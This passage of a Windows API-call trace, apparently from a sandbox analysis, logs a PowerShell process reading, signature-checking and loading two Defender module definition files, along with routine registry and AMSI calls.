ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x396e)) returned 1 [0274.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c978) returned 1 [0274.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0274.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0274.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0274.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0274.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c888) returned 1 [0274.490] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83cbb0 | out: lpFileInformation=0x1b83cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c309006, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x396e)) returned 1 [0274.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c838) returned 1 [0274.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0274.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0274.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca88) returned 1 [0274.491] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b8 [0274.491] GetFileType (hFile=0x3b8) returned 0x1 [0274.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0274.491] GetFileType (hFile=0x3b8) returned 0x1 [0274.491] WTGetSignatureInfo () returned 0x0 [0274.739] CertDuplicateCertificateContext (pCertContext=0x1ad09b20) returned 0x1ad09b20 [0274.739] CryptCATHandleFromStore () returned 0x81ee00 [0274.739] WTHelperGetProvSignerFromChain () returned 0x818ed0 [0274.739] WTHelperGetProvCertFromChain () returned 0x1aa10d00 [0274.740] CertDuplicateCertificateContext (pCertContext=0x1ad09e20) returned 0x1ad09e20 [0274.740] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83caf8 | out: phkResult=0x1b83caf8*=0x5dc) returned 0x0 [0274.741] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x0, lpcbData=0x1b83cb40*=0x0 | out: lpType=0x1b83cb48*=0x1, lpData=0x0, lpcbData=0x1b83cb40*=0x56) returned 0x0 [0274.741] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x2959dc8, lpcbData=0x1b83cb40*=0x56 | out: lpType=0x1b83cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b83cb40*=0x56) returned 0x0 [0274.741] RegCloseKey (hKey=0x5dc) returned 0x0 [0274.741] CoTaskMemAlloc (cb=0x10) returned 0x1ace8090 [0274.742] CoTaskMemAlloc (cb=0x50) returned 0x1acc7870 [0274.742] WinVerifyTrust () returned 0x0 [0274.742] CoTaskMemFree (pv=0x1acc7870) [0274.742] CoTaskMemFree (pv=0x1ace8090) [0274.742] CertFreeCertificateContext (pCertContext=0x1ad09b20) returned 1 [0274.742] CloseHandle (hObject=0x3b8) returned 1 [0274.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0274.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", nBufferLength=0x57, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml", lpFilePart=0x0) returned 0x56 [0274.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83cd48) returned 1 [0274.743] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatCatalog.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatcatalog.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b8 [0274.743] GetFileType (hFile=0x3b8) returned 0x1 [0274.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83ccb8) returned 1 [0274.744] GetFileType (hFile=0x3b8) returned 0x1 [0274.744] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x0 [0274.744] ReadFile (in: hFile=0x3b8, lpBuffer=0x295af10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x295af10*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0274.746] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x1000 [0274.746] ReadFile (in: hFile=0x3b8, lpBuffer=0x295af10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x295af10*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0274.747] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x2000 [0274.747] ReadFile (in: hFile=0x3b8, lpBuffer=0x295af10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x295af10*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0274.747] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3000 [0274.747] ReadFile (in: hFile=0x3b8, lpBuffer=0x295af10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x295af10*, lpNumberOfBytesRead=0x1b83cd58*=0x96e, lpOverlapped=0x0) returned 1 [0274.747] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x396e [0274.748] ReadFile (in: hFile=0x3b8, lpBuffer=0x295a3e6, nNumberOfBytesToRead=0x292, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x295a3e6*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0274.748] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x396e [0274.748] ReadFile (in: hFile=0x3b8, lpBuffer=0x295af10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x295af10*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0274.749] CoTaskMemAlloc (cb=0x20c) returned 0x1acf1630 [0274.749] GetSystemDirectoryW (in: lpBuffer=0x1acf1630, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0274.754] CoTaskMemFree (pv=0x1acf1630) [0274.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0274.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0274.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca18) returned 1 [0274.755] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd40 | out: lpFileInformation=0x1b83cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x2cb24397, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0274.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9c8) returned 1 [0274.755] GetSystemInfo (in: lpSystemInfo=0x1b83cdc0 | out: lpSystemInfo=0x1b83cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0274.755] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83ccc8 | out: phkResult=0x1b83ccc8*=0x5e0) returned 0x0 [0274.756] RegQueryValueExW (in: hKey=0x5e0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83cd18, lpData=0x0, lpcbData=0x1b83cd10*=0x0 | out: lpType=0x1b83cd18*=0x0, lpData=0x0, lpcbData=0x1b83cd10*=0x0) returned 0x2 [0274.756] RegCloseKey (hKey=0x5e0) returned 0x0 [0274.756] CloseHandle (hObject=0x3b8) returned 1 [0275.155] CoCreateGuid (in: pguid=0x1b83ce58 | out: pguid=0x1b83ce58*(Data1=0xd04c20b2, Data2=0x87f8, Data3=0x4ba6, Data4=([0]=0xbc, [1]=0xd9, [2]=0xea, [3]=0x12, [4]=0x59, [5]=0x69, [6]=0xac, [7]=0xfb))) returned 0x0 [0275.168] AmsiScanBuffer () returned 0x80070015 [0275.218] EtwEventWriteTransfer () returned 0x0 [0275.365] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c0a0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0275.367] EtwEventActivityIdControl () returned 0x0 [0275.367] EtwEventActivityIdControl () returned 0x0 [0275.367] EtwEventActivityIdControl () returned 0x0 [0275.368] EtwEventActivityIdControl () returned 0x0 [0275.369] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0275.369] EtwEventActivityIdControl () returned 0x0 [0275.369] EtwEventActivityIdControl () returned 0x0 [0275.369] EtwEventActivityIdControl () returned 0x0 [0275.370] EtwEventActivityIdControl () returned 0x0 [0275.370] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0x80e11910, Data2=0x5c78, Data3=0x4dd6, Data4=([0]=0x89, [1]=0x70, [2]=0xd7, [3]=0x5c, [4]=0x7b, [5]=0x86, [6]=0x26, [7]=0x41))) returned 0x0 [0275.370] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0x50118181, Data2=0xf843, Data3=0x4dfd, Data4=([0]=0xb4, [1]=0x4f, [2]=0xeb, [3]=0x10, [4]=0x44, [5]=0x1d, [6]=0xfb, [7]=0x83))) returned 0x0 [0275.371] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0275.371] EtwEventActivityIdControl () returned 0x0 [0275.371] EtwEventActivityIdControl () returned 0x0 [0275.371] EtwEventActivityIdControl () returned 0x0 [0275.372] EtwEventActivityIdControl () returned 0x0 [0275.373] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml")) returned 0x20 [0275.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0275.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0275.378] CoTaskMemAlloc (cb=0x20c) returned 0x1aceeff0 [0275.378] GetSystemDirectoryW (in: lpBuffer=0x1aceeff0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0275.379] CoTaskMemFree (pv=0x1aceeff0) [0275.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0275.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0275.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9f8) returned 1 [0275.379] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd20 | out: lpFileInformation=0x1b83cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x2cb24397, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0275.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9a8) returned 1 [0275.379] GetSystemInfo (in: lpSystemInfo=0x1b83cda0 | out: lpSystemInfo=0x1b83cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0275.380] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83cca8 | out: phkResult=0x1b83cca8*=0x3b8) returned 0x0 [0275.380] RegQueryValueExW (in: hKey=0x3b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83ccf8, lpData=0x0, lpcbData=0x1b83ccf0*=0x0 | out: lpType=0x1b83ccf8*=0x0, lpData=0x0, lpcbData=0x1b83ccf0*=0x0) returned 0x2 [0275.380] RegCloseKey (hKey=0x3b8) returned 0x0 [0275.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0275.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0275.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca48) returned 1 [0275.381] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x29dffb8 | out: lpFileInformation=0x29dffb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c309006, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3966)) returned 1 [0275.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0275.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0275.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0275.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9c8) returned 1 [0275.381] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83ccf0 | out: lpFileInformation=0x1b83ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c309006, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3966)) returned 1 [0275.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c978) returned 1 [0275.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0275.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0275.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0275.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0275.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c888) returned 1 [0275.382] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83cbb0 | out: lpFileInformation=0x1b83cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c309006, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3966)) returned 1 [0275.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c838) returned 1 [0275.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0275.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0275.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca88) returned 1 [0275.382] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b8 [0275.383] GetFileType (hFile=0x3b8) returned 0x1 [0275.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0275.383] GetFileType (hFile=0x3b8) returned 0x1 [0275.383] WTGetSignatureInfo () returned 0x0 [0275.618] CertDuplicateCertificateContext (pCertContext=0x1ad0a020) returned 0x1ad0a020 [0275.618] CryptCATHandleFromStore () returned 0x81ee90 [0275.618] WTHelperGetProvSignerFromChain () returned 0x817be0 [0275.619] WTHelperGetProvCertFromChain () returned 0x1aa11030 [0275.619] CertDuplicateCertificateContext (pCertContext=0x1ad08fa0) returned 0x1ad08fa0 [0275.620] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83caf8 | out: phkResult=0x1b83caf8*=0x5dc) returned 0x0 [0275.620] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x0, lpcbData=0x1b83cb40*=0x0 | out: lpType=0x1b83cb48*=0x1, lpData=0x0, lpcbData=0x1b83cb40*=0x56) returned 0x0 [0275.620] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x29e0850, lpcbData=0x1b83cb40*=0x56 | out: lpType=0x1b83cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b83cb40*=0x56) returned 0x0 [0275.620] RegCloseKey (hKey=0x5dc) returned 0x0 [0275.620] CoTaskMemAlloc (cb=0x10) returned 0x1ace7af0 [0275.620] CoTaskMemAlloc (cb=0x50) returned 0x1acc7870 [0275.620] WinVerifyTrust () returned 0x0 [0275.621] CoTaskMemFree (pv=0x1acc7870) [0275.621] CoTaskMemFree (pv=0x1ace7af0) [0275.621] CertFreeCertificateContext (pCertContext=0x1ad0a020) returned 1 [0275.621] CloseHandle (hObject=0x3b8) returned 1 [0275.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0275.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0275.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83cd48) returned 1 [0275.622] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b8 [0275.622] GetFileType (hFile=0x3b8) returned 0x1 [0275.622] SetThreadErrorMode (dwNewMode=0x0, 